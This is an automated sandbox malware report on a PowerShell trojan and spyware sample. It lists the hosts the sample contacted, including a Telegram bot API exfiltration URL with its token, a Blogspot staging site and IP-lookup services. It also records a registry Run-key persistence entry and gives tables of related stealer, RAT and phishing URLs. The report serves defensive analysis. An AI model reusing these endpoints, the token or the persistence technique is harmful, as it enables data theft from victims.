http://blogspot.l.googleusercontent.com	powershell.exe, 0000000F.00000002.2322477147.000002D2AB25C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2322477147.000002D2AB27D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DA36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DA55000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.google.com/g/2005	powershell.exe, 0000000F.00000002.2322477147.000002D2AB2F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DAD1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000000.00000002.2595181727.00000244287F0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000000.00000002.2595181727.00000244287F0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ip-api.com	RegSvcs.exe, 00000005.00000002.3250437857.0000000002816000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.google.com/g/2005#thumbnail	powershell.exe, 00000017.00000002.2535220422.0000028E2DACA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.2445820760.0000024417F61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.3250437857.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2322477147.000002D2AA7F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2CFD3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://minecap4-22-24.blogspot.com/	powershell.exe, 00000017.00000002.2535220422.0000028E2DACA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000000.00000002.2595181727.00000244287F0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.blogger.com	powershell.exe, 00000017.00000002.2535220422.0000028E2DACA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp	false		high
http://a9.com/-/spec/opensearchrss/1.0/	powershell.exe, 0000000F.00000002.2322477147.000002D2AB2F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DAD1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 0000000F.00000002.2322477147.000002D2AACF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2D4B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://img1.blogblog.com/img/b16-rounded.gif	powershell.exe, 00000017.00000002.2535220422.0000028E2DACA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000000.00000002.2595181727.00000244287F0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/	RegSvcs.exe, 00000005.00000002.3250437857.00000000027B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.ver)	svchost.exe, 00000012.00000002.3247677107.00000235C680D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://upx.sf.net	Amcache.hve.10.dr	false		high
http://minecap4-22-24.blogspot.com	powershell.exe, 0000000F.00000002.2322477147.000002D2AB25C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2322477147.000002D2AACF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2322477147.000002D2AB27D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2D4B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DA36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DA55000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ipify.org/t	RegSvcs.exe, 00000005.00000002.3250437857.00000000027B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://minecap4-22-24.blogspot.	powershell.exe, 00000017.00000002.2535220422.0000028E2DAD1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/sendDocumentLR	RegSvcs.exe, 00000005.00000002.3250437857.0000000002874000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/Prod/C:	edb.log.18.dr, qmgr.db.18.dr	false		high
http://schemas.google.com/blogger/2008	powershell.exe, 0000000F.00000002.2322477147.000002D2AB2F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DAD1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://minecap4-22-24.blogspot.com/feeds/posts/default	powershell.exe, 0000000F.00000002.2322477147.000002D2AB2F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DAD1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micro	powershell.exe, 00000017.00000002.2629762784.0000028E45324000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp	false		high
https://minecap4-22-24.blogspot.com	powershell.exe, 0000000F.00000002.2322477147.000002D2AB268000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2322477147.000002D2AB27D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2322477147.000002D2AB2A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DA42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DA7E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000000.00000002.2445820760.0000024417F61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2322477147.000002D2AA83E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2322477147.000002D2AA82B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2CFFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2CFE7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.georss.org/georss	powershell.exe, 0000000F.00000002.2322477147.000002D2AB2F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DAD1000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://api.telegram.org	RegSvcs.exe, 00000005.00000002.3250437857.0000000002874000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.3250437857.0000000002A09000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.v	powershell.exe, 00000017.00000002.2530488190.0000028E2B0F0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.blogger.com/styles/atom.css	powershell.exe, 00000017.00000002.2535220422.0000028E2DAD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DACA000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.251.15.132	blogspot.l.googleusercontent.com	United States	15169	GOOGLEUS	false
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
172.67.74.152	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1431777
Start date and time:	2024-04-25 19:00:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	o3KyzpE7F4.ps1 renamed because original name is a hash value
Original Sample Name:	286e6941de5c1fdf6b1dfc6726c0c6f0.ps1
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winPS1@29/26@4/5
EGA Information:	Successful, ratio: 37.5%
HCA Information:	Successful, ratio: 71% Number of executed functions: 159 Number of non-executed functions: 17
Cookbook Comments:	Found application associated with file extension: .ps1

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, schtasks.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 40.127.169.103, 23.40.205.9, 23.40.205.40, 23.40.205.75, 23.40.205.49, 23.40.205.57, 23.40.205.48, 23.40.205.11, 23.40.205.41, 23.40.205.35, 199.232.210.172, 192.229.211.108, 13.85.23.206, 40.126.28.21, 40.126.7.35, 40.126.28.11, 40.126.28.13, 40.126.7.32, 40.126.28.23, 40.126.28.14, 40.126.28.20, 20.242.39.171, 20.189.173.22, 23.63.206.91, 23.40.205.26, 23.40.205.51, 23.40.205.73, 23.40.205.67, 23.40.205.83, 23.40.205.56, 23.40.205.74
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, login.msa.msidentity.com, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
Execution Graph export aborted for target RegSvcs.exe, PID 4956 because it is empty
Execution Graph export aborted for target RegSvcs.exe, PID 6784 because it is empty
Execution Graph export aborted for target mshta.exe, PID 5392 because there are no executed function
Execution Graph export aborted for target mshta.exe, PID 7820 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 7196 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:00:59	API Interceptor	171x Sleep call for process: powershell.exe modified
19:01:24	API Interceptor	1412991x Sleep call for process: RegSvcs.exe modified
19:01:31	API Interceptor	2x Sleep call for process: svchost.exe modified
19:01:31	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run DRAKEXnew1 schtasks /run /tn DRAKEXnew1
19:01:36	API Interceptor	2x Sleep call for process: dw20.exe modified
19:01:47	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run DRAKEXnew1 schtasks /run /tn DRAKEXnew1

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe	Get hash	malicious	Exela Stealer, Python Stealer	Browse	ip-api.com/json
	Control-Tributario_KFRCkzlbCHUSEBMRSECA.zip	Get hash	malicious	Unknown	Browse	ip-api.com/json
	Swift Payment.bat	Get hash	malicious	AgentTesla, GuLoader	Browse	ip-api.com/line/?fields=hosting
	SARL RABINEAU Order FA2495.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	PURCHASE ORDER LIST GREEN VALLY CORP PDF.bat	Get hash	malicious	GuLoader	Browse	ip-api.com/line/?fields=hosting
	Spare part list.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	QUOTATION_APRQTRA031244#U00b7PDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	DHL EXPRESS.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Zapytanie ofertowe Fl#U00e4ktGroup 04232024.hta	Get hash	malicious	AgentTesla, GuLoader	Browse	ip-api.com/line/?fields=hosting
149.154.167.220	UMJLhijN4z.exe	Get hash	malicious	AsyncRAT, Prynt Stealer, StormKitty, WorldWind Stealer	Browse
	Proforma Request.exe	Get hash	malicious	AgentTesla	Browse
	DHL EXPRESS.exe	Get hash	malicious	AgentTesla	Browse
	17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse
	e-dekont.exe	Get hash	malicious	AgentTesla	Browse
	Reconfirm Details.vbs	Get hash	malicious	AgentTesla	Browse
	X1.exe	Get hash	malicious	XWorm	Browse
	Output.exe	Get hash	malicious	RedLine, XWorm	Browse
	X2.exe	Get hash	malicious	XWorm	Browse
	HS202410407 Elemento de proyecto MSMU5083745.pdf.exe	Get hash	malicious	AgentTesla	Browse
172.67.74.152	Sonic-Glyder.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	Sky-Beta.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=json
	Sky-Beta.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=json
	Sky-Beta-Setup.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	Sky-Beta.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	SongOfVikings.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=json
	SongOfVikings.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=json
	Sky-Beta Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=json

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fp2e7a.wpc.phicdn.net	http://www.jdenviro.ca	Get hash	malicious	Unknown	Browse	192.229.211.108
	https://rro5wktwxr4n.rollout-specialist-assistance-network.cfd/support_case_ID/#8347435238	Get hash	malicious	Unknown	Browse	192.229.211.108
	https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==	Get hash	malicious	HTMLPhisher	Browse	192.229.211.108
	https://r20.rs6.net/tn.jsp?f=001mdupJ4qBb-Nd2_ylzx8HBttlQ9opTAsCLDNaIzR_kjOMUNmpNcZJwTrf1-JKcQms1CJ9Uho976bwGC08_tX5C5noMjVDoDyLOXoK3aopxxStOM8t6wvTBKWgVo18etJYQ_eeHjJ4R2lwkep1pKOUg8VLdGfphtuo&c=&ch=/Er8BdK9PMSuOgr2lskWkeZAKVKx339#?ZnJhbmtfZHJhcGVyQGFvLnVzY291cnRzLmdvdg==	Get hash	malicious	HTMLPhisher	Browse	192.229.211.108
	http://lyddemper.com	Get hash	malicious	Unknown	Browse	192.229.211.108
	file.exe	Get hash	malicious	PureLog Stealer, RedLine, zgRAT	Browse	192.229.211.108
	https://runrun.it/share/portal/x1pWDYC5l2f72kuw	Get hash	malicious	HTMLPhisher	Browse	192.229.211.108
	http://seattlend.com	Get hash	malicious	Unknown	Browse	192.229.211.108
	https://1drv.ms/o/s!AmFI0faGJpjZhESzK-ltQ-Z_UHmf?e=0OfhLS	Get hash	malicious	Unknown	Browse	192.229.211.108
	file.exe	Get hash	malicious	LummaC	Browse	192.229.211.108
ip-api.com	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe	Get hash	malicious	Exela Stealer, Python Stealer	Browse	208.95.112.1
	Control-Tributario_KFRCkzlbCHUSEBMRSECA.zip	Get hash	malicious	Unknown	Browse	208.95.112.1
	Swift Payment.bat	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	SARL RABINEAU Order FA2495.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	PURCHASE ORDER LIST GREEN VALLY CORP PDF.bat	Get hash	malicious	GuLoader	Browse	208.95.112.1
	Spare part list.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	QUOTATION_APRQTRA031244#U00b7PDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	DHL EXPRESS.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Zapytanie ofertowe Fl#U00e4ktGroup 04232024.hta	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
api.telegram.org	UMJLhijN4z.exe	Get hash	malicious	AsyncRAT, Prynt Stealer, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	Proforma Request.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	DHL EXPRESS.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	e-dekont.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Reconfirm Details.vbs	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	explorer.exe	Get hash	malicious	RedLine, XWorm	Browse	149.154.167.220
	X1.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	Output.exe	Get hash	malicious	RedLine, XWorm	Browse	149.154.167.220
	X2.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
api.ipify.org	http://wsj.pm	Get hash	malicious	NetSupport RAT	Browse	104.26.12.205
	16770075581.zip	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	SecuriteInfo.com.Win32.PWSX-gen.18376.4403.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	Proforma Request.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Spare part list.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	DHL EXPRESS.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	M_F+niestandardowy stempel.xlsx.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	responsibilityleadpro.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	F#U0130YAT TEKL#U0130F.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	104.26.12.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	http://rfpteams.ksplastlc.net	Get hash	malicious	Unknown	Browse	149.154.167.99
	UMJLhijN4z.exe	Get hash	malicious	AsyncRAT, Prynt Stealer, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	Proforma Request.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	DHL EXPRESS.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	e-dekont.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Reconfirm Details.vbs	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	X1.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	Output.exe	Get hash	malicious	RedLine, XWorm	Browse	149.154.167.220
	X2.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
TUT-ASUS	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe	Get hash	malicious	Exela Stealer, Python Stealer	Browse	208.95.112.1
	Control-Tributario_KFRCkzlbCHUSEBMRSECA.zip	Get hash	malicious	Unknown	Browse	208.95.112.1
	Swift Payment.bat	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	SARL RABINEAU Order FA2495.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	PURCHASE ORDER LIST GREEN VALLY CORP PDF.bat	Get hash	malicious	GuLoader	Browse	208.95.112.1
	Spare part list.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	QUOTATION_APRQTRA031244#U00b7PDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	DHL EXPRESS.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Zapytanie ofertowe Fl#U00e4ktGroup 04232024.hta	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
CLOUDFLARENETUS	http://www.mh3solaroh.com/	Get hash	malicious	HTMLPhisher	Browse	104.17.246.203
	https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==	Get hash	malicious	HTMLPhisher	Browse	172.67.69.226
	https://www.jottacloud.com/s/3542495a6cd3d7a4aafad5878d671fdee68	Get hash	malicious	Unknown	Browse	162.159.152.4
	http://email.wantyourfeedback.com/ls/click?upn=u001.PD4nPnyJUo8oiEzSkSGLgaBNAMtLp9U5nstWElDmnpXtySPOXSs4GxXhEZNYegDWlOpy_1gt1aDjd5mPVItYgazWgABkVm-2FZUH6kt1lIvkdtkRWsfoyQV18ixDvOX-2B0tU4ZH6SMN7PC0YJjM3gcvFPvh6CbZuFXlOBXf3FWLiJkpKJ7Hjba3S4-2FzhpmkR8VdprfK8GO3qSu-2BzqpIaLLC-2Bva9kOn7HY5B7OIgz5EOl88o1lnRSRpayTzqRzTSFhtg2Bi-2BI4dAZ7qHRbJ3vb9lcrxBKqAk13I-2BCAvndhSK1Vi4ubCjlp2xQlrXIHfzqmLiSPjl7tEmTsLYr99h3esBOPv8ASLIpf873P512I7xYEOjogT1gQCerfZNqh6K2IdWU6lDJ2r3wpU6ug02vU9Zslw4DYpuNNZQNVtap5mqv9Xf8D1PYQxYI5BK4owXOV2wEXeRIjST24XAw6EO9D1tdiGoHDRaxW2QofayefCuiW9Z191aML90svJWojHiQp1Fq-2BXFLiyEx8V1eLa7dixfJ23RRWtHvg1jOrHp7lqvXRA7dobs-3D	Get hash	malicious	HTMLPhisher	Browse	172.67.223.170
	file.exe	Get hash	malicious	LummaC	Browse	104.21.16.225
	http://wsj.pm	Get hash	malicious	NetSupport RAT	Browse	104.26.0.231
	https://rro5wktwxr4n.rollout-specialist-assistance-network.cfd/support_case_ID/#8347435238	Get hash	malicious	Unknown	Browse	172.67.222.163
	https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==	Get hash	malicious	HTMLPhisher	Browse	104.21.17.5
	file.exe	Get hash	malicious	Clipboard Hijacker, RisePro Stealer	Browse	104.26.5.15
	https://r20.rs6.net/tn.jsp?f=001mdupJ4qBb-Nd2_ylzx8HBttlQ9opTAsCLDNaIzR_kjOMUNmpNcZJwTrf1-JKcQms1CJ9Uho976bwGC08_tX5C5noMjVDoDyLOXoK3aopxxStOM8t6wvTBKWgVo18etJYQ_eeHjJ4R2lwkep1pKOUg8VLdGfphtuo&c=&ch=/Er8BdK9PMSuOgr2lskWkeZAKVKx339#?ZnJhbmtfZHJhcGVyQGFvLnVzY291cnRzLmdvdg==	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	http://www.jdenviro.ca	Get hash	malicious	Unknown	Browse	23.1.237.91
	Isass.exe	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://www.mavengroupglobal.uk/DYuPhO4h/v?url=qs6eqSurmcWXoQKf6zcjhg6iePdEghHaDt49dq0x39xgLRd6M1#qs6eqSurmcWXoQKf6zcjhg6iePdEghHaDt49dq0x39xgLRd6M1EFEEZ2FicmllbC5wYXJ2dWxlc2N1QGRldXRzY2hlYmFobi5jb20=	Get hash	malicious	Unknown	Browse	23.1.237.91
	http://ipscanadvsf.com	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://functional-adhesive-titanium.glitch.me/	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://www.canva.com/design/DAGDNh45X_4/PPCLYIV4Y8uUaoEW7ZJrJQ/view?utm_content=DAGDNh45X_4&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://bind.bestresulttostart.com/scripts/statistics.js?s=7.8.2	Get hash	malicious	Unknown	Browse	23.1.237.91
	SWIFT.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	23.1.237.91
	https://docs.google.com/presentation/d/e/2PACX-1vRA7cYu2pjKyfaCRROgTu4J2OpPGWE_raEqtGhCVl21QDvJzZsVPQtIU_FG6khcCjqxbwzOTOoBBBx6/pub?start=false&loop=false&delayms=3000&slide=id.p	Get hash	malicious	Unknown	Browse	23.1.237.91
	http://rfpteams.ksplastlc.net	Get hash	malicious	Unknown	Browse	23.1.237.91
3b5074b1b5d032e5620f69f9f700ff0e	https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==	Get hash	malicious	HTMLPhisher	Browse	142.251.15.132 149.154.167.220 172.67.74.152
	http://wsj.pm	Get hash	malicious	NetSupport RAT	Browse	142.251.15.132 149.154.167.220 172.67.74.152
	Isass.exe	Get hash	malicious	Unknown	Browse	142.251.15.132 149.154.167.220 172.67.74.152
	https://itniy4gbb.cc.rs6.net/tn.jsp?f=001DpCT81a7BIE926OduG6KmKkwKebSAbUZq28C52DoY-FfQJyM_2Gq3l18V1j7KWwJQTfGlQ_HSq0vC8xqJqFST9z0CwmpWgUieBjKckdJcSODJ_3vu5MzvaSoOGbGY9SjpWQtg9-aAXm1e6VV91z84Q2_wlyDMR98&c=i37ZFF5Dy2QSFqOfb2TVpr5vkMFqaR6DdoQbIhzcRV7G2oFwX8NEvA==&ch=2ErEiCYnoykaXa1uoD0AgTD1vOpSqc6zh3ef32Gb4XR_ut8_qvmzHA==&c=&ch=&__=/mrlZp0zmTKgGvsPpx0JUyCMjGZr4J6/Z2dvbnphbGV6c2FsYXNAc2FuaXRhcy5lcw==	Get hash	malicious	HTMLPhisher	Browse	142.251.15.132 149.154.167.220 172.67.74.152
	SecuriteInfo.com.Win32.PWSX-gen.18376.4403.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	142.251.15.132 149.154.167.220 172.67.74.152
	Minutes_of_15th_Session_of_PSC.pdf.exe	Get hash	malicious	Unknown	Browse	142.251.15.132 149.154.167.220 172.67.74.152
	Minutes_of_15th_Session_of_PSC.pdf.exe	Get hash	malicious	Unknown	Browse	142.251.15.132 149.154.167.220 172.67.74.152
